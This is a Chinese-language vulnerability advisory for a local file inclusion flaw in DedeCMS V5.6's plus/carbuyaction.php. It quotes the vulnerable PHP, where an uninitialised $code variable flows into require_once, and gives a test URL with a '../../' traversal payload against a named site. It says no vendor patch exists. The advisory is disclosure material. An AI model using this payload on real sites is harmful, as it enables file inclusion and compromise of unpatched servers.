织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞

发布时间:2010-06-20
影响版本:

DedeCmsV5.6

漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板：模板全部使用文件形式保存，对用户设计模板、网站升级转移均提供很大的便利，健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。

<?php
require_once (dirname(__FILE__) . "/../include/common.inc.php");
define('_PLUS_TPL_', DEDEROOT.'/templets/plus');
require_once DEDEINC.'/dedetemplate.class.php';
require_once DEDEINC.'/shopcar.class.php';
require_once DEDEINC.'/memberlogin.class.php';

if($cfg_mb_open=='N')
{
ShowMsg("系统关闭了会员功能，因此你无法访问此页面！","javascript:;");
exit();
}

$cfg_ml = new MemberLogin();

if(!isset($dopost) || empty($dopost)){ //只要$dopost不为空就行，By：俺是农村的。
...
}elseif($dopost == 'return'){
require_once DEDEINC.'/payment/'.$code.'.php';//变量$code未初始化，By：俺是农村的。
$pay = new $code;
$msg=$pay->respond();
ShowMsg($msg,"javascript:;",0,3000);
exit();
}
?>

测试方法:

本站提 供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

http://www.ssvdb.com/plus/carbuyaction.php?dopost=return&code=../../

安全建议:

厂商补丁：
DedeCMS
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.dedecms.com/